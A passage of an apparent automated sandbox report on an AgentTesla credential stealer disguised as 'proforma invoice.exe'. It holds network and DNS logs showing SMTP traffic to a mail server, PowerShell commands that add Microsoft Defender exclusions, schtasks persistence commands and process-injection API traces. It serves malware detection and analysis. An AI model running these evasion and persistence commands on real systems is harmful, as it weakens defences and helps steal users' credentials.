Dec 9, 2024 08:33:34.830657005 CET	443	49742	104.26.13.205	192.168.2.3
Dec 9, 2024 08:33:34.830965042 CET	49742	443	192.168.2.3	104.26.13.205
Dec 9, 2024 08:33:34.834891081 CET	49742	443	192.168.2.3	104.26.13.205
Dec 9, 2024 08:33:34.834908009 CET	443	49742	104.26.13.205	192.168.2.3
Dec 9, 2024 08:33:36.043956995 CET	443	49742	104.26.13.205	192.168.2.3
Dec 9, 2024 08:33:36.044038057 CET	49742	443	192.168.2.3	104.26.13.205
Dec 9, 2024 08:33:36.045872927 CET	49742	443	192.168.2.3	104.26.13.205
Dec 9, 2024 08:33:36.045882940 CET	443	49742	104.26.13.205	192.168.2.3
Dec 9, 2024 08:33:36.046159983 CET	443	49742	104.26.13.205	192.168.2.3
Dec 9, 2024 08:33:36.124917984 CET	49742	443	192.168.2.3	104.26.13.205
Dec 9, 2024 08:33:36.167330980 CET	443	49742	104.26.13.205	192.168.2.3
Dec 9, 2024 08:33:36.308567047 CET	49736	25	192.168.2.3	46.175.148.58
Dec 9, 2024 08:33:36.491813898 CET	443	49742	104.26.13.205	192.168.2.3
Dec 9, 2024 08:33:36.491884947 CET	443	49742	104.26.13.205	192.168.2.3
Dec 9, 2024 08:33:36.491933107 CET	49742	443	192.168.2.3	104.26.13.205
Dec 9, 2024 08:33:36.494896889 CET	49742	443	192.168.2.3	104.26.13.205
Dec 9, 2024 08:33:37.057570934 CET	49748	25	192.168.2.3	46.175.148.58
Dec 9, 2024 08:33:38.042969942 CET	49748	25	192.168.2.3	46.175.148.58
Dec 9, 2024 08:33:40.043145895 CET	49748	25	192.168.2.3	46.175.148.58
Dec 9, 2024 08:33:40.324398994 CET	49736	25	192.168.2.3	46.175.148.58
Dec 9, 2024 08:33:44.043087959 CET	49748	25	192.168.2.3	46.175.148.58
Dec 9, 2024 08:33:48.324346066 CET	49736	25	192.168.2.3	46.175.148.58
Dec 9, 2024 08:33:52.043174028 CET	49748	25	192.168.2.3	46.175.148.58

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 9, 2024 08:33:30.294532061 CET	58237	53	192.168.2.3	1.1.1.1
Dec 9, 2024 08:33:30.431139946 CET	53	58237	1.1.1.1	192.168.2.3
Dec 9, 2024 08:33:32.931219101 CET	52643	53	192.168.2.3	1.1.1.1
Dec 9, 2024 08:33:33.204138041 CET	53	52643	1.1.1.1	192.168.2.3

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Dec 9, 2024 08:33:30.294532061 CET	192.168.2.3	1.1.1.1	0x8e49	Standard query (0)	api.ipify.org	A (IP address)	IN (0x0001)	false
Dec 9, 2024 08:33:32.931219101 CET	192.168.2.3	1.1.1.1	0xfef0	Standard query (0)	mail.iaa-airferight.com	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Dec 9, 2024 08:33:22.208250999 CET	1.1.1.1	192.168.2.3	0xf4c4	No error (0)	shed.dual-low.s-part-0035.t-0009.t-msedge.net	s-part-0035.t-0009.t-msedge.net		CNAME (Canonical name)	IN (0x0001)	false
Dec 9, 2024 08:33:22.208250999 CET	1.1.1.1	192.168.2.3	0xf4c4	No error (0)	s-part-0035.t-0009.t-msedge.net		13.107.246.63	A (IP address)	IN (0x0001)	false
Dec 9, 2024 08:33:30.431139946 CET	1.1.1.1	192.168.2.3	0x8e49	No error (0)	api.ipify.org		104.26.13.205	A (IP address)	IN (0x0001)	false
Dec 9, 2024 08:33:30.431139946 CET	1.1.1.1	192.168.2.3	0x8e49	No error (0)	api.ipify.org		172.67.74.152	A (IP address)	IN (0x0001)	false
Dec 9, 2024 08:33:30.431139946 CET	1.1.1.1	192.168.2.3	0x8e49	No error (0)	api.ipify.org		104.26.12.205	A (IP address)	IN (0x0001)	false
Dec 9, 2024 08:33:33.204138041 CET	1.1.1.1	192.168.2.3	0xfef0	No error (0)	mail.iaa-airferight.com		46.175.148.58	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

api.ipify.org

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.3	49728	104.26.13.205	443	7644	C:\Users\user\Desktop\proforma invoice.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-09 07:33:31 UTC	155	OUT	GET / HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0 Host: api.ipify.org Connection: Keep-Alive
2024-12-09 07:33:32 UTC	424	IN	HTTP/1.1 200 OK Date: Mon, 09 Dec 2024 07:33:32 GMT Content-Type: text/plain Content-Length: 12 Connection: close Vary: Origin CF-Cache-Status: DYNAMIC Server: cloudflare CF-RAY: 8ef34ebb2fd60fa3-EWR server-timing: cfL4;desc="?proto=TCP&rtt=1569&min_rtt=1567&rtt_var=593&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2821&recv_bytes=769&delivery_rate=1837633&cwnd=222&unsent_bytes=0&cid=a6e1e7552568c553&ts=447&x=0"
2024-12-09 07:33:32 UTC	12	IN	Data Raw: 38 2e 34 36 2e 31 32 33 2e 32 32 38 Data Ascii: 8.46.123.228

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.3	49742	104.26.13.205	443	8100	C:\Users\user\AppData\Roaming\CGWlZD.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-09 07:33:36 UTC	155	OUT	GET / HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0 Host: api.ipify.org Connection: Keep-Alive
2024-12-09 07:33:36 UTC	424	IN	HTTP/1.1 200 OK Date: Mon, 09 Dec 2024 07:33:36 GMT Content-Type: text/plain Content-Length: 12 Connection: close Vary: Origin CF-Cache-Status: DYNAMIC Server: cloudflare CF-RAY: 8ef34ed60878c45c-EWR server-timing: cfL4;desc="?proto=TCP&rtt=1582&min_rtt=1581&rtt_var=595&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2819&recv_bytes=769&delivery_rate=1837633&cwnd=242&unsent_bytes=0&cid=d6f9866d607ec1a4&ts=446&x=0"
2024-12-09 07:33:36 UTC	12	IN	Data Raw: 38 2e 34 36 2e 31 32 33 2e 32 32 38 Data Ascii: 8.46.123.228

Target ID:	0
Start time:	02:33:24
Start date:	09/12/2024
Path:	C:\Users\user\Desktop\proforma invoice.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\proforma invoice.exe"
Imagebase:	0x3d0000
File size:	953'344 bytes
MD5 hash:	4CD97C3AF5DC22901FAE8C5851719EDE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.1365596647.00000000040A9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000002.1365596647.00000000040A9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	02:33:25
Start date:	09/12/2024
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\proforma invoice.exe"
Imagebase:	0xc50000
File size:	457'216 bytes
MD5 hash:	3F92A35BA26FF7A11A49E15EFE18F0C2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	02:33:25
Start date:	09/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff720030000
File size:	873'472 bytes
MD5 hash:	7366FBEFE66BA0F1F5304F7D6FEF09FE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	02:33:25
Start date:	09/12/2024
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\CGWlZD.exe"
Imagebase:	0xc50000
File size:	457'216 bytes
MD5 hash:	3F92A35BA26FF7A11A49E15EFE18F0C2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	02:33:25
Start date:	09/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff720030000
File size:	873'472 bytes
MD5 hash:	7366FBEFE66BA0F1F5304F7D6FEF09FE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	02:33:25
Start date:	09/12/2024
Path:	C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\CGWlZD" /XML "C:\Users\user\AppData\Local\Temp\tmp4844.tmp"
Imagebase:	0xea0000
File size:	187'904 bytes
MD5 hash:	48C2FE20575769DE916F48EF0676A965
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	02:33:25
Start date:	09/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff720030000
File size:	873'472 bytes
MD5 hash:	7366FBEFE66BA0F1F5304F7D6FEF09FE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	9
Start time:	02:33:26
Start date:	09/12/2024
Path:	C:\Users\user\Desktop\proforma invoice.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\proforma invoice.exe"
Imagebase:	0xe30000
File size:	953'344 bytes
MD5 hash:	4CD97C3AF5DC22901FAE8C5851719EDE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000009.00000002.2578053721.000000000042F000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000009.00000002.2578053721.000000000042F000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000009.00000002.2580742665.00000000032AC000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000009.00000002.2580742665.0000000003281000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000009.00000002.2580742665.0000000003281000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	10
Start time:	02:33:26
Start date:	09/12/2024
Path:	C:\Users\user\AppData\Roaming\CGWlZD.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Roaming\CGWlZD.exe"
Imagebase:	0xf50000
File size:	953'344 bytes
MD5 hash:	4CD97C3AF5DC22901FAE8C5851719EDE
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 66%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	11
Start time:	02:33:31
Start date:	09/12/2024
Path:	C:\Windows\System32\wbem\WmiPrvSE.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Imagebase:	0x7ff67bb00000
File size:	496'640 bytes
MD5 hash:	60FF40CFD7FB8FE41EE4FE9AE5FE1C51
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	12
Start time:	02:33:32
Start date:	09/12/2024
Path:	C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\CGWlZD" /XML "C:\Users\user\AppData\Local\Temp\tmp6458.tmp"
Imagebase:	0xea0000
File size:	187'904 bytes
MD5 hash:	48C2FE20575769DE916F48EF0676A965
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	13
Start time:	02:33:32
Start date:	09/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff720030000
File size:	873'472 bytes
MD5 hash:	7366FBEFE66BA0F1F5304F7D6FEF09FE
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	14
Start time:	02:33:33
Start date:	09/12/2024
Path:	C:\Users\user\AppData\Roaming\CGWlZD.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Roaming\CGWlZD.exe"
Imagebase:	0x800000
File size:	953'344 bytes
MD5 hash:	4CD97C3AF5DC22901FAE8C5851719EDE
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000E.00000002.2581503168.0000000002D2C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000E.00000002.2581503168.0000000002D01000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000E.00000002.2581503168.0000000002D01000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Has exited:	false

Show Windows behavior

Execution Graph

Execution Coverage:	13%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	257
Total number of Limit Nodes:	9

Executed Functions

Function 00AD33A8 Relevance: 1.6, Strings: 1, Instructions: 376
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Fz/0, xrefs: 00AD36BB

Memory Dump Source

Source File: 00000000.00000002.1343768375.0000000000AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ad0000_proforma invoice.jbxd

Similarity

API ID:
String ID: Fz/0
API String ID: 0-4070063546
Opcode ID: 61c6386824c34b24994532f5830823be601f09965687de279e5b51e9a4411e1b
Instruction ID: f5655dfd1cdd5c15fd083a08abd957c613a7d4d06b055553980e28b521d7747c
Opcode Fuzzy Hash: 61c6386824c34b24994532f5830823be601f09965687de279e5b51e9a4411e1b
Instruction Fuzzy Hash: 3EF1A071D09289CFCB05CFA4D99549EFFB1FF8A300B24859AC402AB356D3359A46CF96

Function 00AD34B8 Relevance: 1.5, Strings: 1, Instructions: 298COMMON

Download Yara Rule

Strings

Fz/0, xrefs: 00AD36BB

Memory Dump Source

Source File: 00000000.00000002.1343768375.0000000000AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ad0000_proforma invoice.jbxd

Similarity

API ID:
String ID: Fz/0
API String ID: 0-4070063546
Opcode ID: 261e93e8634cac3eec35a284f43b2eb5ae760a4693c11f42201a5231d8579a72
Instruction ID: 2bdeda93570818852849690bcad85ed89a419af52c708f439f59c8c62a6cf411
Opcode Fuzzy Hash: 261e93e8634cac3eec35a284f43b2eb5ae760a4693c11f42201a5231d8579a72
Instruction Fuzzy Hash: A3D138B5E05209DFCB04DF95E5808AEFBB2FF88300B24959AD406AB314D735EA42DF95

Function 00AD0871 Relevance: 1.3, Strings: 1, Instructions: 83COMMON

Download Yara Rule

Strings

#_, xrefs: 00AD0878

Memory Dump Source

Source File: 00000000.00000002.1343768375.0000000000AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ad0000_proforma invoice.jbxd

Similarity

API ID:
String ID: #_
API String ID: 0-77867515
Opcode ID: fcfc6371350f1f859842f0d5a45d24462f2bce07fe2e473b2967f9349736f9ac
Instruction ID: 12e7f9e202e0bc8f3a8cdd4332d204e9734bb6723a95a1f95353388bf8dcbbe6
Opcode Fuzzy Hash: fcfc6371350f1f859842f0d5a45d24462f2bce07fe2e473b2967f9349736f9ac
Instruction Fuzzy Hash: F531DA71E016188FEB58CFABD84079EBBB3AFC8300F14C5BAD519A6264EB340A458F51

Function 00AD9CF8 Relevance: .3, Instructions: 296COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1343768375.0000000000AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ad0000_proforma invoice.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a8debbdfeb3eb74d526d968d2f78a2811bdeb0f1bb4aad2d2a0833b36b37bfe8
Instruction ID: c36e0c6456b61a972eb3d42be3ae0e314f651be7f7854e89b0968dba2304db57
Opcode Fuzzy Hash: a8debbdfeb3eb74d526d968d2f78a2811bdeb0f1bb4aad2d2a0833b36b37bfe8
Instruction Fuzzy Hash: F2D1E678E01619CFCB14CFA9D9446AEBBB2FF89300F10956AD50AE7364E7349A41CF51

Function 00AD9CE8 Relevance: .3, Instructions: 294COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1343768375.0000000000AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ad0000_proforma invoice.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: df1849d20ef0788e7607faf049779f8fe1b23257a2b4d35a400a60f1fb3e8501
Instruction ID: 818228529f210a1ee190a82981ac0b2d8753ad4c1dc812b6ff7aab3b15d6e6fe
Opcode Fuzzy Hash: df1849d20ef0788e7607faf049779f8fe1b23257a2b4d35a400a60f1fb3e8501
Instruction Fuzzy Hash: 3DD1D678E01619CFCB14CFA9D9446AEBBB2FF89300F10956AD80AE7364E7349942CF51

Function 00ADA330 Relevance: .2, Instructions: 202COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1343768375.0000000000AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ad0000_proforma invoice.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9e966e8812373a0c33fdd2b56746ee6d0b7a78b4516f1a37e88516f245114857
Instruction ID: 053a34a7a20ab7ed6edc9ed5d34d33307f9f997769864edc9896071ada93b742
Opcode Fuzzy Hash: 9e966e8812373a0c33fdd2b56746ee6d0b7a78b4516f1a37e88516f245114857
Instruction Fuzzy Hash: C291C478E002188FDB08DFA9D9586EEBBF2FF88310F14946AD809AB365DB345941DF50

Function 00AD9B84 Relevance: .2, Instructions: 199COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1343768375.0000000000AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ad0000_proforma invoice.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d90e9705f52a3d84728351a6bd9cc3f8c36c2d74a2571e663e20b2e91f095ffe
Instruction ID: 4adbccb45d1e4865287955e34473f49990cb6263999962fcb633f3f3137a21db
Opcode Fuzzy Hash: d90e9705f52a3d84728351a6bd9cc3f8c36c2d74a2571e663e20b2e91f095ffe
Instruction Fuzzy Hash: 5791C578E002088FDB08DFA9D9586EEBBF2FF88300F14946AD41AAB365DB745941DF50

Function 00AD1360 Relevance: .2, Instructions: 189COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1343768375.0000000000AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ad0000_proforma invoice.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 49bd17a74c8ca6401766e001d4c2d050a4efbd27ceeaee632294a9ec8145cb03
Instruction ID: 3d5b601151ec71e3e205924450e13b9b0a3774dac0753610b1bd9cb225506362
Opcode Fuzzy Hash: 49bd17a74c8ca6401766e001d4c2d050a4efbd27ceeaee632294a9ec8145cb03
Instruction Fuzzy Hash: ED81C2B4E012199FDB08CFAAD984AAEFBB2FF88300F24812AD516BB354D7745945CF54

Function 00AD1B89 Relevance: .2, Instructions: 153COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1343768375.0000000000AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ad0000_proforma invoice.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 30e1fa8784570c026bfbc972e59275c57bd0ce20f7f3a6ad04dab3b586378189
Instruction ID: 2b8f84cd1c5f9a606c2528cbb7248c1cee92b6abf0b57d2da48b5514e8450457
Opcode Fuzzy Hash: 30e1fa8784570c026bfbc972e59275c57bd0ce20f7f3a6ad04dab3b586378189
Instruction Fuzzy Hash: 75510670E156099FDB08CFA6C5806AEFBF2EF89301F24D46AD416A7254D3389A41DF94

Function 09460360 Relevance: .1, Instructions: 119COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1382156117.0000000009460000.00000040.00000800.00020000.00000000.sdmp, Offset: 09460000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9460000_proforma invoice.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2f4e882ab35b46043800f7236f4bc14592ca07809679c0fd531d092eb43e6bff
Instruction ID: aaabae001e47b5428f07927feab20a26f26b78ce4bd2efaf2a83c8135d260e2d
Opcode Fuzzy Hash: 2f4e882ab35b46043800f7236f4bc14592ca07809679c0fd531d092eb43e6bff
Instruction Fuzzy Hash: E14117B1D01219CBDB18CF96C8447EEFBB6AF89340F14C16AD409BB264C735598A8FA1

Function 00AD2530 Relevance: .1, Instructions: 74COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1343768375.0000000000AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ad0000_proforma invoice.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3b03b5e054c4f90310277c83917b00868d1d6f7b45cea850395b799aa49ba2ab
Instruction ID: bf7a8ef212db32225152fc8df778aa7ee09dab979ec9de1d5ad3fa41322108d0
Opcode Fuzzy Hash: 3b03b5e054c4f90310277c83917b00868d1d6f7b45cea850395b799aa49ba2ab
Instruction Fuzzy Hash: 05313971E016588FDB18CFAAD9546DEBBB3AFC9300F14C16AD409AB364DB744A85CF50

Function 09460370 Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1382156117.0000000009460000.00000040.00000800.00020000.00000000.sdmp, Offset: 09460000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9460000_proforma invoice.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0452bc35ab4bc07bf49ea29b23c8f65f5f316c6f80075101320523698a828df7
Instruction ID: f6b23e4ac6d33b604913152a932d1b6a3b4d31297b208cb716c1f63dc9a5ceeb
Opcode Fuzzy Hash: 0452bc35ab4bc07bf49ea29b23c8f65f5f316c6f80075101320523698a828df7
Instruction Fuzzy Hash: 7631F7B1D05218CBEB18CF97C8547EEBBF6AF89300F14C06AD409BA264DB751946CF51

Function 094665D5 Relevance: 1.7, APIs: 1, Instructions: 247
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 09466816

Memory Dump Source

Source File: 00000000.00000002.1382156117.0000000009460000.00000040.00000800.00020000.00000000.sdmp, Offset: 09460000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9460000_proforma invoice.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 92a3014b802b90b56bfe6fa20600a918546dda4827dc372f2ee03479e7057a90
Instruction ID: 2957ba20e8f3e3a7e687c184eb8e4f74f4ddb8dc225c32b6e43631f32505e9fd
Opcode Fuzzy Hash: 92a3014b802b90b56bfe6fa20600a918546dda4827dc372f2ee03479e7057a90
Instruction Fuzzy Hash: 22A15CB1D00219DFEB24CFA4C9417EEBBB2BF44304F1585AAE809A7250DB759985CF92

Function 094665E0 Relevance: 1.7, APIs: 1, Instructions: 243
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 09466816

Memory Dump Source

Source File: 00000000.00000002.1382156117.0000000009460000.00000040.00000800.00020000.00000000.sdmp, Offset: 09460000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9460000_proforma invoice.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 3fd7800721640c61478b8a4454f279c8b4d3a4b980eac649eb45fca261f9dc28
Instruction ID: 2ebf22b616fabc33cf62430f79248f1d589617b0e388df9fb51357907a11cc0e
Opcode Fuzzy Hash: 3fd7800721640c61478b8a4454f279c8b4d3a4b980eac649eb45fca261f9dc28
Instruction Fuzzy Hash: D6915AB1D00319DFEB20CFA4C9417DEBBB2BF44314F1585AAE809A7250DB759985CFA2

Function 09466350 Relevance: 1.6, APIs: 1, Instructions: 73
injectionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 094663E8

Memory Dump Source

Source File: 00000000.00000002.1382156117.0000000009460000.00000040.00000800.00020000.00000000.sdmp, Offset: 09460000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9460000_proforma invoice.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: dc1520a0e8084dd09bb4a33b80c404ed5d4b88baec9d84549f27c8f40a919a05
Instruction ID: e8c6de2dfa98fb2cf390aa3ef5e2cd5aade726b42ccc50ecc04c56683352358f
Opcode Fuzzy Hash: dc1520a0e8084dd09bb4a33b80c404ed5d4b88baec9d84549f27c8f40a919a05
Instruction Fuzzy Hash: 3A2144B29003499FDB00DFAAC985BDEBBF4FB48310F00842AE918A7350D7789955CBA1

Function 09466358 Relevance: 1.6, APIs: 1, Instructions: 69
injectionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 094663E8

Memory Dump Source

Source File: 00000000.00000002.1382156117.0000000009460000.00000040.00000800.00020000.00000000.sdmp, Offset: 09460000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9460000_proforma invoice.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: fffcd7015892753b3f78af8bfdf323bc64b1c65cf0994449bb511981df6d36ae
Instruction ID: 5b6e5e4baa63b808224ea2eef6653d009994c7ef6d6e26afb50b3f1fe4ccac25
Opcode Fuzzy Hash: fffcd7015892753b3f78af8bfdf323bc64b1c65cf0994449bb511981df6d36ae
Instruction Fuzzy Hash: 912110B19003499FDB10CFAAC984BEEBBF5FB48314F10842AE918A7250D7789954CBA1

Function 09465DB9 Relevance: 1.6, APIs: 1, Instructions: 66
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Wow64SetThreadContext.KERNEL32(?,00000000), ref: 09465E3E

Memory Dump Source

Source File: 00000000.00000002.1382156117.0000000009460000.00000040.00000800.00020000.00000000.sdmp, Offset: 09460000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9460000_proforma invoice.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: 7a12a46a39acf996ac610101e520a969b8f408028e4ed60fbb637c0e1b1e9937
Instruction ID: 8249d0aad23933d24fbc51e2ff7fd0d274690d85684f3ace66f1f69b7391ad2a
Opcode Fuzzy Hash: 7a12a46a39acf996ac610101e520a969b8f408028e4ed60fbb637c0e1b1e9937
Instruction Fuzzy Hash: 5F2145B1D003098FEB10DFAAC4857EEBBF4AF88214F14842EE559A7350C7799945CFA1

Function 09466441 Relevance: 1.6, APIs: 1, Instructions: 65
COMMON

Download Yara Rule

Control-flow Graph

